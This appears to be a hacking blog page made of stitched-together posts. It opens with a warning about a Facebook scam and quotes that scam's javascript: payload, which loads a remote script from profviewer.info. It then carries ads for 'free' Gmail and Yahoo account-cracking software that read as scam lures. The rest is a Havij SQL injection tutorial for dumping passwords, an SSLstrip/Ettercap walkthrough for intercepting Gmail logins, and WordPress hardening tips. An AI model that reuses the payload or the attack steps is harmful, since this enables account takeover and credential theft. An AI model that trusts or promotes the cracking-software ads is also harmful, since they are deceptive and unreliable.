Be Careful of Facebook.com Lady Gaga Hacks !

Today, my friend got a message from one of his friends :

Given that this seemed quite suspicious, have paid attention and tried to the end.

When you open the link opens facebook.com page : http://www.facebook.com/pages/You-will-Hate-Lady-Gaga-after-watching-this-video/240965975962567

And then - click on CONTINUE, appears tricky instructions:

And really - in performing such a process's address bar Javascirpt demand! 

javascript: (a = (b = document). createElement ('script')). src =
'Http://profviewer.info/new.js' b.body.appendChild (a): void (0)

You just press ENTER and your all friends will get same private message I showed you in the beginning of this post.


Please share this post everywhere so that your friends and facebook stay away from being hacked !

Those who're interested in that Lady Gaga page. Please explore it more.

Gmail Password Hacking Software Free Download

Get your lost Gmail passwords back with our FREE Gmail password hacking software!

We are offering our free Gmail password hacking software free of charge through this website for a limited time only! Our Gmail password hack allows you to retrieve your lost or forgotten Gmail password completely free of charge. Reliable Gmail hacking software is pretty tough to locate on the Internet, especially FREE Gmail hacking software! Our Gmail password hacking program is called Gmail Password Retriever PRO, it is designed with the average Internet user in mind witch means it's really easy to use, you can now retrieve Gmail passwords through a simple 1,2,3 process! Gmail hacking has never been easier! Gmail Password Retriever PRO: Free Download

How to Hack a Gmail Account?

1) Download and Install The Software shown bellow.

2) Select the Gmail account you want hacked and click crack.

3) You're done!

(Screenshot of the Gmail Hacker PRO)

By clicking on the download link above you certify your agreement with and you are binded by our ToS & AUP.

This application has been created with the intent to help users looking to hack Gmail passwords. You have most likely already searched on the internet countless times on "how to hack Gmail" or "Gmail password hacking" to no avail. Our free Gmail password hacking software offers its user the ability to crack Gmail account password in less than 30 seconds per account. Gmail hacking has never been as easy and fast as it is now. All that's required on your end to get started and to do your first Gmail password crack is to download our free Gmail hacking software and install it on your system now!. This is a very limited offer and will expire shortly.

Important information: You must agree our Terms and Conditions before browsing our website and/or using, reviewing, downloading and installing our software. We are only providing lost or forgotten information recovery related products on our website. You should never use our products, services or materials on our website for any hacking or cracking related activities that may infringe any law of any country or territory in any direct or indirect manner.

Free Yahoo Password Hacking Software

Get your lost Yahoo passwords back with our FREE Yahoo password hacking software!

We are offering our free Yahoo password hacking software free of charge through this website for a limited time only! Our Yahoo password hack allows you to retrieve your lost or forgotten Yahoo password completely free of charge. Reliable Yahoo hacking software is pretty tough to locate on the Internet, especially FREE Yahoo hacking software! Our Yahoo password hacking program is called Yahoo Password Retriever PRO, it is designed with the average Internet user in mind witch means it's really easy to use, you can now retrieve Yahoo passwords through a simple 1,2,3 process! Yahoo hacking has never been easier! Yahoo Password Retriever PRO: Free Download

How to Hack a Yahoo Account?

1) Download and Install The Software shown bellow.

2) Select the Yahoo account you want hacked and click crack.

3) You're done!

(Screenshot of the Yahoo Hacker PRO)

By clicking on the download link above you certify your agreement with and you are binded by our ToS & AUP.

This application has been created with the intent to help users looking to hack Yahoo passwords. You have most likely already searched on the internet countless times on "how to hack Yahoo" or "Yahoo password hacking" to no avail. Our free Yahoo password recovery tool offers its user the ability to hack Yahoo passwords in less than 30 seconds per account. Yahoo hacking has never been as easy and fast as it is now. All that's required on your end to get started and to do your first Yahoo password crack is to download our free Yahoo hacking software and install it on your system now!. This is a very limited offer and will expire shortly.

Important information: You must agree our Terms and Conditions before browsing our website and/or using, reviewing, downloading and installing our software. We are only providing lost or forgotten information recovery related products on our website. You should never use our products, services or materials on our website for any hacking or cracking related activities that may infringe any law of any country or territory in any direct or indirect manner.

Lots of people think that Javascript is an inferior language but Javascript is an extremly powerful language and those people who think the other way they either don't know how to use it or are not familiar with it's capabilities, With javascript you can do lots of cool things such as edit any page, make an image fly etc, but it is a waste of time to spend your time on making images fly with javascripts or editing a page.
Anyways coming to the main topic, did you know that javascript can be used to detect if a page is a spoofed website or phishingwebsite or a legit one, well if you don't know just paste the following code in to the address bar and a pop up will appear telling you whether the website is original or not
Here is the Javascript code:

javascript:alert("The actual URL is:\t\t" + location.protocol + "//" + location.hostname + "/" + "\nThe address URL is:\t\t" + location.href + "\n" + "\nIf the server names do not match, this may be a spoof.");

SQL Injection Tutorial with HAVJI

According to a survey the most common technique of hacking a website is SQL Injection. SQL Injection is a technique in which hacker insert SQL codes into web Forum to get Sensitive information like (User Name , Passwords) to access the site and Deface it. The traditional SQL injection method is quite difficult, but now a days there are many tools available online through which any script kiddie can use SQL Injection to deface a webite, because of these tools websites have became more vulnerable to these types of attacks.

One of the popular tools is Havij, Havij is an advanced SQL injection tool which makes SQL Injection very easy for you, Along with SQL injection it has a built in admin page finder which makes it very effective.

Warning - This article is only for education purposes, By reading this article you agree that HWA is not responsible in any way for any kind of damage caused by the information provided in this article.

Supported Databases With Havij

• MsSQL 2000/2005 with error.

• MsSQL 2000/2005 no error union based

• MySQL union based

• MySQL Blind

• MySQL error based

• MySQL time based

• Oracle union based

• MsAccess union based

• Sybase (ASE)

Demonstration

Now i will Show you step by step the process of SQL injection.

Step1: Find SQL injection Vulnerability in tour site and insert the string (likehttp://www.target.com/index.asp?id=123) of it in Havij as show below.

Step3: Now click on the Analyse button as shown below.

Now if the your Server is Vulnerable the information about the target will appear and the columns will appear like shown in picture below:

Step4: Now click on the Tables button and then click Get Tables button from below column as shown below:

Step5: Now select the Tables with sensitive information and click Get Columns button.After that select the Username and Password Column to get the Username and Password and click on the Get Table button.

Countermeasures:

Here are some of the countermeasures you can take to reduce the risk of SQL Injection

1.Renaming the admin page will make it difficult for a hacker to locate it

3.Use a Intrusion detection system and compose the signatures for popular SQL injection strings

4. One of the best method to protect your website against SQL Injection attacks is to disallow special characters in the admin form, though this will make your passwords more vulnerable to bruteforce attacks but you can implement a capcha to prevent these types of attack.

Man In The Middle Attack - SSL Hacking

One of the most successful way of gaining information such as passwords,user ids etc in LAN (local area network) is through man in the middle attacks . I will not be going to deep into Man in the middle attacks, but in simple words it can be explained as attacker or a hacker listening to all the information sent in between the client and the server .To prevent these kind of attacks Email providers started using Hypertext Transfer Protocol Secure (HTTPS) It is a combination of the Hypertext Transfer Protocol(HTTP) with SSL (Secure socket layer )protocol to provide encrypted communication between the client and the server .So when a hacker caries out a Mimt attack the victim is cautioned with a invalid SSL Certificate



In this tutorial I will teach how to carry out a successful Mitm attack

Concept :-

We Know that HTTP (Hypertext Transfer Protocol )simply sends all the information through plain text .So if we make the victim use HTTP instead of HTTPS to connect sites like Gmail , Pay pal. we will be able to carry out a successful Mitm attack with out causing any suspicion To do this we are going to use a tool called SSL strip

Read More: What is SSL(Secure Socket Layer)

Thing we Need

1. SSL strip: You can search Google for SSL strip it comes both in windows and Linux versions . I will be using the windows version in this tutorial

2. Ettercap to carry out mitm attacks

Demonstration :-

1. Open SSL strip and fill in all the required information for arpsoof, network ,ssl strip, change data .If you don’t know what to enter simply click auto check . remember to check if HTTPS to HTTP is included in Change data , finally click ok

2. Now select the victim’s IP and click open

3. Now open ettercap go to sniff -unsniffed sniffing and select your network interface and click ok

4. Now select hosts-scan hosts .Once scanning is completed .Open host list from hosts tab .Now select the IP address of the router as target 1 and the victims IP as target 2

5. Now select mitm-arp poisoning and click ok as shown

6. Finally select start-start sniffing .Now when the victim logs into gmail he will be using HTTPand not HTTPS Hence we are able to get the User id ,passwords as shown below

Counter measures:

1. whenever you perform an online transaction such as Credit card payment, Bank login or Email login always ensure that you Use HTTPS

2. Always check the SSL certificate before doing an online transaction

How To Secure Your Wordpress Blogs?

Hackers are the person like you and us but the only difference is that they use their skills for the negative and destructive purposes, they use their skills to break awebsite, they normally destroy all the stuff's, so if you are a admin of a website you should care about the security of the website.
As you know that the wordpress is a common and most popular plate form for blogging, but the security of the wordpress is always a hot discussion and it need more and more concentration because vulnerability discover everyday. Below are some tips to make your blog secure:

Secure WP-Admin By IP

Let suppose if someone can get the ability(username & Password) to enter into your websiteWP section, you can restrict this area by your IP. It prevent brute forcing attack and only you can able to control on your website because of IP restriction.

Order deny,allow
Deny from All
Allow from 123.456.789.0
You can allow and deny IP's from a range use this:
order deny,allow deny from all # allow my home IP address allow from XX.XX.XXX.XXX # allow my work IP address allow from XX.XX.XXX.XXX


Protect WP-Config.php File

WP-Config.php file has a great importance on wordpress plate form, it need more care and usually an attacker get the required information about the database of your website from WP-Config file. Basically if you use a strong database user-name and password while your WP-Config security is low than an attacker can get your strong user-name and password from wp-config file, because it contain all the information about the security and other things of yourwebsite.

Access .htaccess file is located at the root your WordPress installation open it and paste the following code.

order allow,deny
deny from all



Hide WordPress Version Number

You must hide the version of your wordpress because an attacker may find the available exploit by searching it on different exploit database by version number and it may cause a great harm for your blog so be care about it.

This tag is in the header.php file that displays your current version of wordpress

Copy and paste the code in the functions.php file of your theme and than you are done.


remove_action('wp_head', 'wp_generator');

Remove Error Message From Login Screen

This is your clever move to remove the error message that an attacker would not able to see if the user-name and password incorrect, update your function.php by this code.

add_filter('login_errors',create_function('$a', \"return null;\"));


Some Other Security Tips

Use your mind because mind is an essential part to secure yourself on the jungle of web.

• Create strong passwords that are not easily be guess or crack.

• Secure your own side(your computer) from different malware.

• Make regular backup of your blog.

• Update your wordpress to latest version

• Use SSH instead of FTP

• Avoid using your account on public places

• You must be ware on different attacks to secure yourself.